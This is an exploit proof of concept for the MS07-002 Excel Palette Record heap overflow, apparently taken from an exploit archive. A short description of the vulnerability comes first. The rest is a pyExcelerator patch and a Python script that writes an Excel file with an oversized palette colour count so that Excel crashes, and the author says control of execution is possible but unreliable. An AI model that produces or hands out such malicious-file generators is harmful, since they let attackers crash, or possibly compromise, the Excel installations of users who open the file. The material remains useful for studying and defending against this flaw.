Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)

MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC

######

Author

######

LifeAsaGeek at gmail.com

... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs

########################

Vulnerablity Description

########################

Bound error occurs when parsing Palette Record and it causes Heap Overflow

check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506

which is generated by DarunGrim

( and I want to say I'm not a person who made this analyzer ==; )

#############

Attack Vector

#############

Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !

Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )

In *CERTAIN* environment( such as open excel file which is already opened)

you can catch the flow by modify function pointer, but it doesn't have a reliablity at all

Let me know if you have a good method to break down

######

Result

######

DOS

#####

Notes

#####

You should modify pyExcelerator module because it doesn't generate Palette Record

pyExcelerator diff results would be like below

diff h:studypyexcelerator-0.6.3apyExcelerator-0.6.3abuildlibpyExceleratorBIFFRecords.py pyExceleratorBIFFRecords.py

1104a1105,1108

> def __init__(self):

> BiffRecord.__init__(self)

> self._rec_data = pack('<H', 0x0038) # number of colours

> self._rec_data = 'A' * 0xe0

diff h:studypyexcelerator-0.6.3apyExcelerator-0.6.3abuildlibpyExceleratorWorkbook.py pyExceleratorWorkbook.py

468,469c468

< result = ''

< return result

---

> return BIFFRecords.PaletteRecord().get()

!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!

- 2007.01.25

"""

import sys, os

from struct import *

from pyExcelerator import *

def CreateXLS():

w = Workbook()

ws = w.add_sheet('MS07-002 POC')

w.save( "before.xls")

def ModifyXLS():

try:

f = open( "before.xls", "rb")

except:

print "File Open Error ! "

sys.exit(0)

str = f.read()

f.close()

#write to malformed xls file

f = open( "after.xls", "wb")

PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038)

NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF)

palette_idx = str.find( PaletteRecord)

if palette_idx == -1:

print "Cannot find Palette Record"

sys.exit(0)

str = str.replace( PaletteRecord, NewPaletteRecord)

f.write( str)

f.close()

if __name__ == "__main__":

print "==========================================================="

print "MS07-002 Malformed Palette Record vulnerability DOS POC "

print "Create POC Excel File after.xls"

print "by LifeAsaGeek at gmail.com"

print "==========================================================="

CreateXLS()

ModifyXLS()

//http://www.leftworld.net